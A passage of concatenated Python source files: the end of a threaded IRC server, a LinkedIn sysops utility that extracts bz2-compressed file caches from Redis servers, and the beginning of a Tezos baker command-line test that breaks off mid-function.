- Channel modes are set on channels to modify their functionality.
- User modes are set on users to change how they are affected by different
commands and features. All user modes are of type D (they never take a parameter).
supported_modes also contains "prefix", which are channel modes set on a user (ex. +o, +v).
More info:
https://modern.ircdocs.horse/#channel-mode
https://modern.ircdocs.horse/#user-modes
"""
self.lock = threading.Lock()
self.channels: Dict[str, Channel] = {}
self.connected_users: Dict[str, UserConnection] = {}
self.port = port
self.motd_content = motd_content
# Supported Modes:
# b: Ban/Unban user from channel (channel)
# i: Make user invisible, and hide them from e.g WHO, NAMES commands.
# o: Set/Unset channel operator (channel)
# t: Only operator can set channel topic (channel)
self.supported_modes: Dict[str, List[str]] = {"A": ["b"], "B": [], "C": [], "D": ["i", "t"], "PREFIX": ["o"]}
def find_user(self, nick: str) -> Optional[UserConnection]:
"""
Looks for a connected user and returns its user object.
Returns None if user doesn't exist.
"""
try:
return self.connected_users[nick.lower()]
except KeyError:
return None
def find_channel(self, channel_name: str) -> Optional[Channel]:
"""
Looks for an existing channel and returns its channel object.
Returns None if user doesn't exist.
"""
try:
return self.channels[channel_name.lower()]
except KeyError:
return None
def delete_user(self, nick: str) -> None:
"""
Removes a user from all channels they are connected to,
thereafter removes user from connected users.
Note: This does not actually disconnect the user from the server.
To disconnect the user, a tuple (None, disconnect_reason: str) must be put in their send queue.
"""
user = self.find_user(nick)
assert user is not None
for channel in self.channels.values():
if user in channel.users:
channel.users.discard(user)
del self.connected_users[nick.lower()]
def delete_channel(self, channel_name: str) -> None:
"""
Removes a channel from server.
"""
del self.channels[channel_name.lower()]
class ConnectionListener:
"""Starts the server and listens for incoming connections from clients."""
def __init__(self, port: int, motd_content: Optional[Dict[str, List[str]]]) -> None:
self.host = ""
self.port = port
self.listener_socket = socket.socket()
self.listener_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.listener_socket.bind((self.host, port))
self.listener_socket.listen(5)
self.state = State(motd_content, self.port)
def run_server_forever(self) -> None:
"""
Accepts incoming connections from clients.
Starts a separate thread to handle each connection.
"""
print(f"Mantatail running (port {self.port})")
while True:
(user_socket, user_address) = self.listener_socket.accept()
print("Got connection from", user_address)
client_thread = threading.Thread(
target=CommandReceiver, args=[self.state, user_address[0], user_socket], daemon=True
)
client_thread.start()
class CommandReceiver:
"""
Receives commands/messages from the client, parses them, and sends them to the appropriate
handler function.
IRC Messages are formatted "bytes(COMMAND parameters\r\n)"
Most IRC clients use "\r\n" line endings, but "\n" is accepted as well (used by e.g. netcat).
Ex: b"JOIN #foo\r\n"
Ex: b"PRIVMSG #foo :This is a message\r\n"
"""
def __init__(self, state: State, user_host: str, user_socket: socket.socket) -> None:
self.state = state
self.user_host = user_host
self.user_socket = user_socket
self.user = UserConnection(state, user_host, user_socket)
self.disconnect_reason: str = ""
self.recv_loop()
def recv_loop(self) -> None:
"""
Parses incoming messages from the client and sends them to the appropriate
"handle_" function.
To handle a command FOO, a function named handle_foo() in commands.py is called.
For example, "PRIVMSG #foo :this is a message\r\n" results in a call like this:
commands.handle_privmsg(state, user, ["#foo", "this is a message"])
The function call is done with getattr().
getattr(commands, "handle_join") is equivalent to commands.handle_join.
More info: https://docs.python.org/3/library/functions.html#getattr
"""
try:
while True:
request = self.receive_messages()
if request is None:
return # go to "finally:"
decoded_command = request.decode("latin-1")
for line in split_on_new_line(decoded_command)[:-1]:
(command, args) = self.parse_received_command(line)
command_lower = command.lower()
handler_function = "handle_" + command_lower
if self.user.nick == "*" or self.user.user_message is None or not self.user.motd_sent:
if command_lower == "quit":
self.disconnect_reason = "Client quit"
return # go to "finally:"
else:
self.handle_user_registration(command_lower, args)
if (
self.user.nick != "*"
and self.user.user_message is not None
and not self.user.capneg_in_progress
):
self.user.on_registration()
else:
try:
# ex. "command.handle_nick" or "command.handle_join"
call_handler_function = getattr(commands, handler_function)
except AttributeError:
errors.unknown_command(self.user, command)
else:
with self.state.lock:
call_handler_function(self.state, self.user, args)
if command_lower == "quit":
return
finally:
self.user.send_que.put((None, self.disconnect_reason))
def receive_messages(self) -> bytes | None:
"""
Receives one or more lines from the client as bytes and returns them to recv_loop().
It will receive until the received bytes end with "\n", which indicates that everything
the client has currently sent has been received.
None is returned if the user disconnects.
Also starts the user's ping timer, which will send a PING message to the client
after a certain time of inactivity.
The PING message controls that the user still has an open connection to the server.
"""
request = b""
while not request.endswith(b"\n"):
self.user.start_ping_timer()
try:
request_chunk = self.user_socket.recv(4096)
except OSError as err:
self.disconnect_reason = err.strerror
return None
finally:
self.user.ping_timer.cancel()
if request_chunk:
request += request_chunk
else:
self.disconnect_reason = "Remote host closed the connection"
return None
return request
def parse_received_command(self, msg: str) -> Tuple[str, List[str]]:
"""
Parses the user command by separating the command (e.g "join", "privmsg", etc.) from the
arguments.
If a parameter contains spaces, it must start with ':' to be interpreted as one parameter.
If the parameter does not start with ':', it will be cut off at the first space.
Ex:
- "PRIVMSG #foo :This is a message\r\n" will send "This is a message"
- "PRIVMSG #foo This is a message\r\n" will send "This"
"""
split_msg = msg.split(" ")
for num, arg in enumerate(split_msg):
if arg.startswith(":"):
parsed_msg = split_msg[:num]
parsed_msg.append(" ".join(split_msg[num:])[1:])
command = parsed_msg[0]
return command, parsed_msg[1:]
command = split_msg[0]
return command, split_msg[1:]
def handle_user_registration(self, command: str, args: List[str]) -> None:
"""
Parses messages from the client before they have registered (provided the server
with their nickname (NICK) and username (USER)).
This limits what commands the user can send before registering.
"""
if command == "user":
if len(args) < 4:
errors.not_enough_params(self.user, command.upper())
else:
self.user.user_message = args
self.user.user_name = args[0]
self.user.real_name = args[3]
elif command == "nick":
commands.handle_nick(self.state, self.user, args)
elif command == "pong":
commands.handle_pong(self.state, self.user, args)
elif command == "cap":
commands.handle_cap(self.state, self.user, args)
else:
errors.not_registered(self.user)
class UserConnection:
"""
Represents the connection between server & client.
Format examples:
- Nick: Alice
- User message: AliceUsr 0 * Alice's Real Name
- Username: AliceUsr
- User Mask Alice!AliceUsr@127.0.0.1 (Nick!Username@Host)
Usually the nick is used when referring to the user.
Send Queue:
A send queue and a separate thread are used for sending messages to the client.
This helps with error handling, and even if someone has a slow internet connection,
other people don't have to wait when a message is sent to several users with a loop.
All messages are sent as a tuple formatted as (message, prefix).
Prefixes are either ":mantatail" or ":sender.user_mask"
A Tuple containing (None, disconnect_reason: str) indicates a QUIT command and closes the connection to the client.
"""
def __init__(self, state: State, host: str, socket: socket.socket):
self.state = state
self.socket = socket
self.host = host
self.nick = "*"
self.user_message: Optional[List[str]] = None
self.user_name: Optional[str] = None
self.real_name: Optional[str] = None
self.modes = {"i"}
self.away: Optional[str] = None # None = user not away, str = user away
self.send_que: queue.Queue[Tuple[str, str | None] | Tuple[None, str]] = queue.Queue()
self.que_thread = threading.Thread(target=self.send_queue_thread)
self.que_thread.start()
self.cap_list: Set[str] = set()
self.motd_sent = False
self.capneg_in_progress = False
self.pong_received = False
def get_user_mask(self) -> str:
"""Generates and returns a user mask (Nick!Username@Host)."""
return f"{self.nick}!{self.user_name}@{self.host}"
def get_prefix(self, channel: Channel) -> str:
"""
Returns appropriate user prefix for a specific channel.
("@" for channel operator, "" for other users).
"""
if self in channel.operators:
return "@"
else:
return ""
def on_registration(self) -> None:
"""
After a user has registered on the server by providing a nickname (NICK) and a username (USER),
several messages are sent to the client with information about the server.
"""
commands.rpl_welcome(self)
commands.rpl_yourhost(self, self.state)
commands.rpl_created(self)
commands.rpl_myinfo(self, self.state)
commands.rpl_isupport(self)
commands.motd(self.state.motd_content, self)
self.motd_sent = True
def send_queue_thread(self) -> None:
"""Queue on which the client receives messages from server."""
while True:
(message, prefix) = self.send_que.get()
if message is None:
disconnect_reason = prefix
quit_message = f"QUIT :Quit: {disconnect_reason}"
with self.state.lock:
self.queue_quit_message_for_other_users(quit_message)
if self.nick != "*":
self.state.delete_user(self.nick)
try:
# Can be slow, if user has bad internet. Don't do this while holding the lock.
if self.nick == "*" or not self.user_message:
self.send_string_to_client(quit_message, None)
else:
self.send_string_to_client(quit_message, self.get_user_mask())
except OSError:
pass
close_socket_cleanly(self.socket)
return
else:
try:
self.send_string_to_client(message, prefix)
except OSError as err:
disconnect_reason = err.strerror
self.send_que.put((None, disconnect_reason))
def queue_quit_message_for_other_users(self, quit_message: str) -> None:
"""Alerts all other users that the User has QUIT and closed the connection to the server."""
receivers = self.get_users_sharing_channel()
for channel in self.state.channels.values():
channel.operators.discard(self)
for receiver in receivers:
receiver.send_que.put((quit_message, self.get_user_mask()))
def get_users_sharing_channel(self) -> Set[UserConnection]:
"""Returns all users of all channels that this user has joined."""
receivers = set()
for channel in self.state.channels.values():
if self in channel.users:
for usr in channel.users:
if usr != self:
receivers.add(usr)
return receivers
def send_string_to_client(self, message: str, prefix: Optional[str]) -> None:
"""
Send a string to the client, without using the send queue.
In most cases, you should put a message to the send queue instead of using this method directly.
"""
try:
if prefix is None:
message_as_bytes = bytes(f"{message}\r\n", encoding="latin-1")
else:
message_as_bytes = bytes(f":{prefix} {message}\r\n", encoding="latin-1")
self.socket.sendall(message_as_bytes)
except OSError:
return
def start_ping_timer(self) -> None:
"""
Starts a timer on a separate thread that, when finished, sends a PING message to the client
to establish that the client still has an open connection to the server.
"""
self.ping_timer = threading.Timer(PING_TIMER_SECS, self.queue_ping_message)
self.ping_timer.start()
def queue_ping_message(self) -> None:
"""
Puts a PING message in the client's send queue, and starts a new timer waiting for the
expected PONG response from the client.
This is done to control that the client still has an open connection to the server.
Ex:
Sends "PING :mantatail"
Expected response: "PONG :mantatail"
"""
self.send_que.put(("PING :mantatail", None))
threading.Timer(240, self.assert_pong_received).start()
def assert_pong_received(self) -> None:
"""
Checks if the client has sent a PONG response to the server's PING message.
If no PONG response has been received, the server closes the connection to the client.
"""
if not self.pong_received:
disconnect_reason = "Ping timeout..."
self.send_que.put((None, disconnect_reason))
else:
self.pong_received = False
class Channel:
"""
An existing channel on the server.
Contains all channel-specific actions and modes.
"""
def __init__(self, channel_name: str, user: UserConnection) -> None:
self.name = channel_name
self.topic: Optional[Tuple[str, str]] = None # (Topic, Topic author)
self.modes: Set[str] = {"t"} # See State __init__ for more info on letters.
self.operators: Set[UserConnection] = set()
self.users: Set[UserConnection] = set()
self.ban_list: Dict[str, str] = {}
self.operators.add(user)
def set_topic(self, user: UserConnection, topic: str) -> None:
if not topic:
self.topic = None
else:
self.topic = (topic, user.nick)
def send_topic_to_user(self, user: UserConnection) -> None:
if self.topic is None:
message = f"331 {user.nick} {self.name} :No topic is set."
user.send_que.put((message, "mantatail"))
else:
topic_message = f"332 {user.nick} {self.name} :{self.topic[0]}"
author_message = f"333 {user.nick} {self.name} :{self.topic[1]}"
user.send_que.put((topic_message, "mantatail"))
user.send_que.put((author_message, "mantatail"))
def queue_message_to_chan_users(self, message: str, sender: UserConnection, send_to_self: bool = True) -> None:
"""
Puts a message in the send queue of all users on the channel.
In cases where the message should not be sent to self (ex. PRIVMSG), the method
is called with send_to_self = False.
"""
for usr in self.users:
if usr != sender or send_to_self:
usr.send_que.put((message, sender.get_user_mask()))
def check_if_banned(self, target: str) -> bool:
"""
Checks if the user mask provided in a MODE +b (ban) command matches a
user mask that is already in the channel's ban list.
Wildcards "*" are used to cover any set of characters.
Ex. If the ban list contains "*!Bar@Baz", "Foo!Bar@Baz" will be considered a match.
"""
return any(fnmatch.fnmatch(target, ban_mask) for ban_mask in self.ban_list.keys())
def close_socket_cleanly(sock: socket.socket) -> None:
"""
Ensures that the connection to a client is closed cleanly without errors and with no data loss.
Use this instead of the .close() method.
"""
# The code is based on this blog post:
# https://blog.netherlabs.nl/articles/2009/01/18/the-ultimate-so_linger-page-or-why-is-my-tcp-not-reliable
try:
sock.shutdown(socket.SHUT_WR)
sock.settimeout(10)
sock.recv(1) # Wait for client to close the connection
except OSError:
# Possible causes:
# - Client decided to keep its connection open for more than 10sec.
# - Client was already disconnected.
# - Probably something else too that I didn't think of...
pass
sock.close()
def split_on_new_line(string: str) -> List[str]:
"""Splits a message received by a client on "\r\n" (most IRC clients) or "\n" (e.g. Netcat)."""
if string.endswith("\r\n"):
return string.split("\r\n")
else:
return string.split("\n")
def get_motd_content_from_json() -> Optional[Dict[str, List[str]]]:
"""Loads the Message of the Day file.
Returns None if the file is not found.
"""
try:
with open("./resources/motd.json", "r") as file:
motd_content: Dict[str, List[str]] = json.load(file)
return motd_content
except FileNotFoundError:
return None
if __name__ == "__main__":
ConnectionListener(6667, get_motd_content_from_json()).run_server_forever()
|
cache_extractor.py
|
#!/usr/bin/python2.6
# filesource \$HeadURL: svn+ssh://csvn@esv4-sysops-svn.corp.linkedin.com/export/content/sysops-svn/cfengine/trunk/generic_cf-agent_policies/config-general/manage_usr_local_admin/CacheExtractor.py $
# version \$Revision: 123922 $
# modifiedby \$LastChangedBy: msvoboda $
# lastmodified \$Date: 2014-06-16 15:49:08 -0400 (Mon, 16 Jun 2014) $
# (c) [2013] LinkedIn Corp. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import os
import sys
import subprocess
import signal
import redis
import hashlib
import threading
import Queue
import platform
sys.path.append("/usr/local/admin")
import sysopsapi.redis_finder
import seco.range
import bz2
# System identifcation
import __main__
import uuid
import pwd
import json
class CacheExtractor(sysopsapi.redis_finder.RedisFinder):
def __init__(self,
scope=None,
site=None,
range_servers=None,
range_query=None,
file=None,
search_string=None,
return_randomized_servers=True,
list_files=False,
prefix_hostnames=False,
verbose=False,
cost=False,
md5sum=False,
stat=False,
wordcount=False,
contents=False,
time=False):
self._cm_conf = open('/etc/cm.conf', 'r')
self._redis_corelist = []
self._object_store = {}
self._named_object_results = {}
self._gold = {}
self._number_of_results = 0
self._verbose = verbose
self._cost = cost
self._list_files = list_files
self._md5sum = md5sum
self._contents = contents
self._stat = stat
self._wordcount = wordcount
self._time = time
self._search_string = search_string
self._prefix_hostnames = prefix_hostnames
self._return_randomized_servers = return_randomized_servers
self._file = file
# We used to use redis database 0, which was plain text. Now, bz2
# compression populates database 1.
self._database = 1
# value at array index 0 is the contents of the file itself.
# value at array index 1 is the md5sum of the file
# value at array index 2 is the os.stat contents of the file.
# value at array index 3 is the wordcount of the file
# value at array index 4 is the cache insertion time of the file
self._index_contents = 0
self._index_md5sum = 1
self._index_stat = 2
self._index_wordcount = 3
self._index_time = 4
self._range_servers = []
if range_servers is not None:
for rs in range_servers.split(','):
self._range_servers.append(rs)
if scope:
self._scope = scope
else:
self._scope = 'local'
if site:
self._site = site
self._scope = 'site'
else:
self._site = self.discover_site()
if range_query:
self._range_query = range_query
# If the user specified a --site on the CLI, allow that option to be preserved. global queries are expensive to search against.
# In the chance that the data isn't found on the site specified on
# the CLI, we throw an execption. Otherwise, execution is much
# faster.
if self._scope != 'site':
self._scope = 'global'
else:
self._range_query = None
if self._list_files:
self._search_string = '/'
if self._search_string:
if "#" not in self._search_string:
self._search_string = '*' + self._search_string + '*'
# The below statement fires off the work in RedisFinder.RedisServes to generate our corelist.
# The CacheExtractor object inherits functions in RedisFinder where
# this work is being processed.
self.query_range_for_redis_corelist()
# O/S information that gets sent to each MPS for each search.
self._user = pwd.getpwuid(os.getuid())
self._uuid = str(uuid.uuid4())
self._cwd = os.getcwd()
import time
if ".linkedin.com" not in platform.node():
self._hostname = platform.node() + ".linkedin.com"
else:
self._hostname = platform.node()
self.info = {}
self.info = {}
self.info['redis_servers'] = {}
self.info['query'] = {}
self.info['totals'] = {}
self.info['totals']['total_bytes_redis_cache_downloaded'] = 0
self.info['totals']['total_bytes_results_decompressed'] = 0
self.info['totals']['total_keys_matched'] = 0
self.info['totals']['total_time_start'] = time.time()
self.info['totals']['total_time_elapsed'] = None
self.info['query']['pw_name'] = self._user.pw_name
self.info['query']['pw_uid'] = self._user.pw_uid
self.info['query']['pw_gid'] = self._user.pw_gid
self.info['query']['pw_gecos'] = self._user.pw_gecos
self.info['query']['pw_dir'] = self._user.pw_dir
self.info['query']['pw_shell'] = self._user.pw_shell
self.info['query']['utility'] = __main__.__file__
self.info['query']['self._scope'] = self._scope
self.info['query']['self._range_query'] = self._range_query
self.info['query']['self._database'] = self._database
self.info['query']['self._redis_corelist'] = self._redis_corelist
self.info['query']['self._site'] = self._site
self.info['query']['self._list_files'] = self._list_files
self.info['query']['self._file'] = self._file
self.info['query']['self._prefix_hostnames'] = self._prefix_hostnames
self.info['query']['self._md5sum'] = self._md5sum
self.info['query']['self._contents'] = self._contents
self.info['query']['self._stat'] = self._stat
self.info['query']['self._wordcount'] = self._wordcount
self.info['query']['self._time'] = self._time
self.info['query']['self._search_string'] = self._search_string
self.info['query'][
'self._return_randomized_servers'] = self._return_randomized_servers
self.info['query']['self._range_servers'] = self._range_servers
self.info['query']['self._redis_corelist'] = self._redis_corelist
self.info['query']['self._hostname'] = self._hostname
self.info['query']['self._cwd'] = self._cwd
if self._verbose:
for key in sorted(self.info['query'].iterkeys()):
print "(+) CacheExtractor __init__ {0} {1}".format(key, self.info['query'][key])
# Do actual work.
if self._search_string:
self.list_of_matching_named_objects()
self.extract_named_objects()
# If requested, query how expensive the given query was.
if self._cost:
self._gold = None
self.display_cost_of_cache()
##########################################################################
def display_cost_of_cache(self):
print json.dumps(self.info['totals'], indent=3, sort_keys=True)
print json.dumps(self.info['redis_servers'], indent=3, sort_keys=True)
##########################################################################
def print_redis_server_information(self):
for redis_server in self._redis_corelist:
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
redis_info = redis_connection.info()
for key in redis_info.iterkeys():
if self._prefix_hostnames:
print redis_server.ljust(30) + "\t" + key.ljust(50) + "\t" + str(redis_info[key]).ljust(80).strip()
else:
print key.ljust(50) + str(redis_info[key]).rjust(50).strip()
##########################################################################
def list_of_matching_named_objects(self):
"""
Populates a dictionary containing a list of named_objects per redis server. If range query has been passed on the CLI,
then we only look for named_objects from hosts within that range. Otherwise, we go 'global' in scope, and return named_objects
for all hosts. Range is actually a restrictive operation here, not an inclusive one.
"""
## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ##
def threaded_object_finder(queue, redis_server):
try:
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
try:
queue.put(
sorted(redis_connection.keys(self._search_string)))
except Exception, e:
print "CacheExtractor.list_of_matching_named_objects().threaded_object_finder() Exception " + str(e)
os._exit(1)
except redis.exceptions.ResponseError, e:
print "CacheExtractor.list_of_matching_named_objects().threaded_object_finder() Exception " + str(e)
os._exit(1)
## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ## ** ##
queue = Queue.Queue()
threads = []
for redis_server in self._redis_corelist:
thread = threading.Thread(
target=threaded_object_finder, args=(queue, redis_server))
threads.append(thread)
thread.start()
self._named_object_results[redis_server] = queue.get()
for named_object in self._named_object_results[redis_server]:
self._number_of_results += 1
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() named_object " + named_object + " discovered from redis server " + redis_server
for thread in threads:
thread.join()
if self._number_of_results == 0:
raise Exception('''No results were found from the search. Please try your search again. use --list-files to get an idea of what objects exist in the cache.
Its possible that you are in the wrong scope. This utility uses a local scope by default.
You might want to be using --scope site, --scope global, or --site <datacenter> to adjust your scope.
https://iwww.corp.linkedin.com/wiki/cf/display/IST/Extracting+the+sysops+cache+for+fun+and+profit#Extractingthesysopscacheforfunandprofit-Levelsofscope
If executing extract_sysops_cache.py, use --help for some basic examples of scope.''')
# When we insert keys into the cache, we insert with <hostname>$<uuid>. At the end of insertion, we rename the key from this uuid to the actual key name.
# The actual key name will be in the form <hostname>#<filename>
# This allows the operation to be atomic. We can either search and find the object, or we can't. Before, there was a race condition where we could be extracting
# the key at the exact moment of insertion. If we dont find a key with "#" in the name of the key, remove it from results. We shouldn't be searching against
# objects that dont contain # in the keyname.
temp_results = {}
for redis_server in self._redis_corelist:
temp_results[redis_server] = []
for named_object in self._named_object_results[redis_server]:
if "#" in named_object:
temp_results[redis_server].append(named_object)
else:
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() named_object " + named_object + " removed from redis server " + redis_server
self._named_object_results[
redis_server] = temp_results[redis_server]
machines = []
if self._range_query:
for range_server in self._range_servers:
if self._verbose:
print "(+) CacheExtractor.list_of_matching_named_objects() range_server is ", range_server
print "(+) CacheExtractor.list_of_matching_named_objects() self.range_query is ", self._range_query
try:
range_connection = seco.range.Range(range_server)
machines = range_connection.expand(self._range_query)
if machines:
break
except seco.range.RangeException:
print "(+) CacheExtractor.list_of_matching_named_objects() range query invalid"
sys.exit(1)
if self._file:
try:
if machines:
if self._file == "-":
boxes = sys.stdin.readlines()
else:
boxes = open(self._file, 'r').readlines()
for box in boxes:
machines.append(box)
else:
if self._file == "-":
machines = sys.stdin.readlines()
else:
machines = open(self._file, 'r').readlines()
except Exception, e:
print "The file " + self._file + " can not be opened. Does it exist? Exiting."
sys.exit(1)
# Both range queries and reading from a file are both restrictive
# actions. We only return objects if we match from either source.
if self._range_query or self._file:
temp_results = {}
for redis_server in self._redis_corelist:
temp_results[redis_server] = []
for named_object in self._named_object_results[redis_server]:
for machine in machines:
if machine.strip() in named_object:
temp_results[redis_server].append(named_object)
self._named_object_results[
redis_server] = temp_results[redis_server]
##########################################################################
def extract_named_objects(self):
threads = []
for redis_server in self._redis_corelist:
thread = threading.Thread(
target=self.threaded_object_extractor, args=(redis_server,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# Update totals for all cost hitting all redis servers.
for redis_server in self._redis_corelist:
self.info['totals']['total_bytes_redis_cache_downloaded'] += self.info[
'redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded']
self.info['totals']['total_bytes_results_decompressed'] += self.info[
'redis_servers'][redis_server][self._uuid]['bytes_results_decompressed']
self.info['totals'][
'total_keys_matched'] += self.info['redis_servers'][redis_server][self._uuid]['keys_matched']
import time
self.info['totals']['total_time_finished'] = time.time()
self.info['totals']['total_time_elapsed'] = self.info['totals'][
'total_time_finished'] - self.info['totals']['total_time_start']
self.info['totals']['total_bytes_per_second'] = int(self.info['totals'][
'total_bytes_redis_cache_downloaded'] / self.info['totals']['total_time_elapsed'])
self.info['totals']['total_human_readable_mb_redis_cache_downloaded'] = '%.3f' % (
self.info['totals']['total_bytes_redis_cache_downloaded'] / 1048576.0)
self.info['totals']['total_human_readable_mb_results_decompressed'] = '%.3f' % (
self.info['totals']['total_bytes_results_decompressed'] / 1048576.0)
self.info['totals']['total_human_readable_mb_per_second'] = '%.3f' % (
self.info['totals']['total_bytes_per_second'] / 1048576.0)
if self.info['totals']['total_bytes_redis_cache_downloaded'] != 0:
self.info['totals']['total_compression_ratio'] = '%.3f' % (float(self.info['totals'][
'total_bytes_results_decompressed']) / float(self.info['totals']['total_bytes_redis_cache_downloaded']))
##########################################################################
def threaded_object_extractor(self, redis_server):
redis_connection = redis.Redis(
host=redis_server, port=6379, db=self._database, socket_timeout=5, charset='utf-8', errors='strict')
redis_pipeline = redis_connection.pipeline()
import time
self.info['redis_servers'][redis_server] = {}
self.info['redis_servers'][redis_server][self._uuid] = {}
self.info['redis_servers'][redis_server][
self._uuid]['redis_server'] = redis_server
self.info['redis_servers'][redis_server][
self._uuid]['time_start'] = time.time()
self.info['redis_servers'][redis_server][self._uuid][
'keys_matched'] = len(self._named_object_results[redis_server])
self._object_store[redis_server] = []
try:
for named_object in self._named_object_results[redis_server]:
if self._contents:
redis_pipeline.lindex(named_object, self._index_contents)
elif self._md5sum:
redis_pipeline.lindex(named_object, self._index_md5sum)
elif self._stat:
redis_pipeline.lindex(named_object, self._index_stat)
elif self._wordcount:
redis_pipeline.lindex(named_object, self._index_wordcount)
elif self._time:
redis_pipeline.lindex(named_object, self._index_time)
# This lies outside the loop of named_objects. The pipeline.execute() below will issue a single redis query to fetch everything at once.
# By using pipelines instead of individual fetches, this reduces cross communcation between the client and server. See here for more details.
# https://github.com/andymccurdy/redis-py
self._object_store[redis_server] = redis_pipeline.execute()
except redis.exceptions.ResponseError, e:
print "CacheExtractor.threaded_object_extractor() Exception " + str(e)
sys.exit(1)
# The named objects array and object store arrays should be a 1-to-1 mapping at this point. Iterate over both arrays in parallel.
# named_object_results[redis_server] = names of the keys
# object_store[redis_server] = whatever we extracted from the redis server for all of the keys
# gold[name of key] = whatever we extracted
self.info['redis_servers'][redis_server][
self._uuid]['bytes_redis_cache_downloaded'] = 0
self.info['redis_servers'][redis_server][
self._uuid]['bytes_results_decompressed'] = 0
uniques = {}
while self._named_object_results[redis_server]:
named_object = self._named_object_results[redis_server].pop()
host, file = named_object.split('#')
if self._object_store[redis_server]:
# We are in data extraction mode with contents, md5sum, stat,
# wordcount, or time
contents_of_named_object = self._object_store[
redis_server].pop()
if contents_of_named_object:
decompressed_data = bz2.decompress(
contents_of_named_object)
self.info['redis_servers'][redis_server][self._uuid][
'bytes_redis_cache_downloaded'] += sys.getsizeof(contents_of_named_object)
self.info['redis_servers'][redis_server][self._uuid][
'bytes_results_decompressed'] += sys.getsizeof(decompressed_data)
if self._return_randomized_servers == "True":
self._gold[named_object] = decompressed_data
else:
self._gold[
named_object + "@" + redis_server] = decompressed_data
else:
# We are either in --search or --list-files operations. We didn't actually extract data. if we are in --list-files, we want a list of unique
# objects, so we build a dictionary to perform the uniques for
# us.
if self._list_files:
uniques[file] = 1
else:
# We are searching, so we want non-unique filename objects
# across multiple hosts
if self._return_randomized_servers == "True":
self._gold[named_object] = None
else:
self._gold[named_object + "@" + redis_server] = None
if self._verbose:
print "(+) CacheExtractor.threaded_object_extractor() file " + file + " from host " + host + " discovered from redis server " + redis_server
if self._list_files:
for file in uniques.iterkeys():
self._gold['files#' + file] = None
# Update per-redis server information and publish to each redis server its own statistics
# Calculate data transfer in bytes
self.info['redis_servers'][redis_server][
self._uuid]['time_finished'] = time.time()
self.info['redis_servers'][redis_server][self._uuid]['time_elapsed'] = self.info['redis_servers'][
redis_server][self._uuid]['time_finished'] - self.info['redis_servers'][redis_server][self._uuid]['time_start']
self.info['redis_servers'][redis_server][self._uuid]['bytes_per_second'] = int(self.info['redis_servers'][redis_server][
self._uuid]['bytes_redis_cache_downloaded'] / self.info['redis_servers'][redis_server][self._uuid]['time_elapsed'])
if self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded'] != 0:
self.info['redis_servers'][redis_server][self._uuid]['compression_ratio'] = '%.3f' % (float(self.info['redis_servers'][redis_server][
self._uuid]['bytes_results_decompressed']) / float(self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded']))
# Convert to megabytes so its somewhat more human readable.
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_redis_cache_downloaded'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_redis_cache_downloaded'] / 1048576.0)
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_results_decompressed'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_results_decompressed'] / 1048576.0)
self.info['redis_servers'][redis_server][self._uuid]['human_readable_mb_per_second'] = '%.3f' % (
self.info['redis_servers'][redis_server][self._uuid]['bytes_per_second'] / 1048576.0)
# Append the global query information
self.info['redis_servers'][redis_server][
self._uuid]['query'] = self.info['query']
# Send to sysops-api
redis_connection.publish(
'sysops-api', json.dumps(self.info['redis_servers'][redis_server]))
##########################################################################
|
test_baker_operations_cli_options.py
|
"""Simple tests to check support for the following operations-related options
for baking
- --ignore-node-mempool
- --operations-pool [file|uri]
"""
import os
import os.path
import json
import time
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing import Process
from typing import List, Any
import pytest
from client.client import Client
from tools import constants, utils
from launchers.sandbox import Sandbox
from . import protocol
PORT = 12121
OPERATIONS_FILES_DIRECTORY = "operations_files"
EMPTY_OPERATIONS = "empty_operations"
ABSENT_OPERATIONS = "this_file_should_not_exist"
SINGLETON_OPERATIONS = "singleton_operations"
TEST_DIR = "tests_alpha"
class MyHttpServer:
"""Simple HTTP server launching in a separate process"""
def __init__(self):
server_address = ('localhost', PORT)
httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
process = Process(target=httpd.serve_forever, args=())
self.process = process
self.server = httpd
def run(self):
self.process.start()
def close(self):
self.server.server_close()
self.process.terminate()
@pytest.fixture
def http_server():
server = MyHttpServer()
server.run()
yield server
server.close()
def get_filename(basename: str) -> str:
return os.path.join(
TEST_DIR, OPERATIONS_FILES_DIRECTORY, f"{basename}.json"
)
class TestIgnoreNodeMempool:
def test_ignore(self, client: Client):
"""Check that a transfer injected into the node is dutifully ignored
when baking with --ignore-node-mempool
"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
client.transfer(2, sender, 'bootstrap5')
utils.bake(
client, bake_args=['--minimal-timestamp', "--ignore-node-mempool"]
)
balance1 = client.get_balance(sender)
# Make sure the operations has not been included, indirectly through
# balance checks
assert balance1 == balance0
assert client.get_level() == 2
def test_no_ignore(self, client: Client):
"""Check that a transfer injected, then ignored, can be injected at the
next block"""
sender = "bootstrap4"
balance0 = client.get_balance(sender)
utils.bake(client, bake_args=['--minimal-timestamp'])
balance1 = client.get_balance(sender)
assert balance1 != balance0
assert client.get_level() == 3
def all_empty(lls: List[List[Any]]) -> bool:
return all(map(lambda l: len(l) == 0, lls))
def only_has_endorsements(lls: List[List[Any]]) -> bool:
